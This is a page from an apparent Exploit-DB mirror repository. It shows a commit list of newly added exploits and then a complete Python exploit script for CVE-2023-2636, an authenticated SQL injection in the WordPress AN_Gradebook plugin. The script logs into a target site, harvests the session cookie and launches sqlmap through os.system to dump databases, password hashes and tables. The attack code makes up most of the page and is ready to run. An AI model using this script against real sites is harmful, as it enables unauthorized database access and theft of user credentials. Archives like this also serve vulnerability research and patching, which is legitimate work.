bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51632.py
Exploit-DB c18d9953a2 DB: 2023-07-29 
22 changes to exploits/shellcodes/ghdb

Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping

Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities

Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS)

Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities

Joomla HikaShop 4.7.4 - Reflected XSS

Joomla VirtueMart Shopping Cart 4.0.12 - Reflected XSS

mooDating 1.2 - Reflected Cross-site scripting (XSS)

October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)

PaulPrinting CMS - (Search Delivery) Cross Site Scripting

Perch v3.2 - Persistent Cross Site Scripting (XSS)

RosarioSIS 10.8.4 - CSV Injection

WordPress Plugin AN_Gradebook 5.0.1 - SQLi

Zomplog 3.9 - Cross-site scripting (XSS)

zomplog 3.9 - Remote Code Execution (RCE)
copyparty 1.8.2 - Directory Traversal
copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)

GreenShot  1.2.10 - Insecure Deserialization Arbitrary Code Execution

mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory

Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)
2023-07-29 00:16:43 +00:00

98 lines
No EOL
3.4 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/python3
# Exploit Title: WordPress Plugin AN_Gradebook <= 5.0.1 - Subscriber+ SQLi
# Date: 2023-07-26
# Exploit Author: Lukas Kinneberg
# Github: https://github.com/lukinneberg/CVE-2023-2636
# Vendor Homepage: https://wordpress.org/plugins/an-gradebook/
# Software Link: https://github.com/lukinneberg/CVE-2023-2636/blob/main/an-gradebook.7z
# Tested on: WordPress 6.2.2
# CVE: CVE-2023-2636
from datetime import datetime
import os
import requests
import json
# User Input:
target_ip = 'CHANGE_THIS'
target_port = '80'
username = 'hacker'
password = 'hacker'
banner = '''
____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||C |||V |||E |||- |||2 |||0 |||2 |||3 |||- |||2 |||6 |||3 |||6 ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
Exploit Author: Lukas Kinneberg
'''
print(banner)
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + '/wp-login.php'
check = session.get(auth_url)
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)
# SQL-Injection (Exploit):
# Generate payload for sqlmap
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
cookie = cookie.replace(',', '; ')
print('[*] Payload for SQL-Injection:')
# Enter the URL path of the course after the target_port below
exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + r'/wp-admin/admin-ajax.php?action=course&id=3" '
exploitcode_risk = '--level 2 --risk 2 '
exploitcode_cookie = '--cookie="' + cookie + '" '
# SQLMAP Printout
print(' Sqlmap options:')
print(' -a, --all Retrieve everything')
print(' -b, --banner Retrieve DBMS banner')
print(' --current-user Retrieve DBMS current user')
print(' --current-db Retrieve DBMS current database')
print(' --passwords Enumerate DBMS users password hashes')
print(' --tables Enumerate DBMS database tables')
print(' --columns Enumerate DBMS database table column')
print(' --schema Enumerate DBMS schema')
print(' --dump Dump DBMS database table entries')
print(' --dump-all Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p id -v 0 --answers="follow=Y" --batch'
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
Reference in a new issue View git blame Copy permalink